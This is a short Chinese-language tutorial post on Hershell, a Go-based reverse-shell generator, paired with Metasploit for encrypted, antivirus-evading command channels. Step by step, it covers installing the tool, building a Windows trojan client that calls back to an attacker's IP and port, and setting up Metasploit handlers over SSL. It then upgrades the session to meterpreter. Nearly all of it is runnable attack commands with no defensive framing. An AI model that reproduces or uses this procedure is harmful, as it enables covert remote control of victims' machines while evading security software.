Hershell反向shell生成器+msf加密通信免杀
简介 Hershell
Hershell(github.com/sysdream/hershell)是基于golang开发的一款反向shell生成器,跨平台、流量加密、免杀效果较好
环境配置
安装golang,go get下载源码,切换到其目录
yum install golang
cd $HOME/go
go get github.com/sysdream/hershell
cd /root/go/src/github.com/sysdream/hershell
使用操作
1、生成证书
make depends
2、生成客户端,运行后会生成hershell.exe,针对其不同平台使用不同方法的生成,修改其参数即可
make windows32 LHOST=服务端IP LPORT=监听端口
3、直接使用msf进行反连
use exploit/multi/handler
set payload python/shell_reverse_tcp_ssl
set lhost 服务端IP
set lport 服务端端口
set HandlerSSLCert ./server.pem
exploit -j
4、靶机运行客户端木马,成功上线
5、hershell的shell自带没有很多功能,最好还是切换到强大的后渗透模块meterpreter,这里本来想使用session -u直接升级会话的,奈何没升级成功
6、另开一个会话启动msf监听
use exploit/multi/handler set payload windows/meterpreter/reverse_https set lhost 服务端ip set lport 服务端端口 set HandlerSSLCert ./server.pem exploit -j
7、hershell使用内置的meterpreter模块迁移,直接退出了会话,这里没明白为什么,和上面session转会话一样,感觉有点玄学,总之,这两种两种都可以来变成meterpreter会话
meterpreter https 服务端ip:服务端端口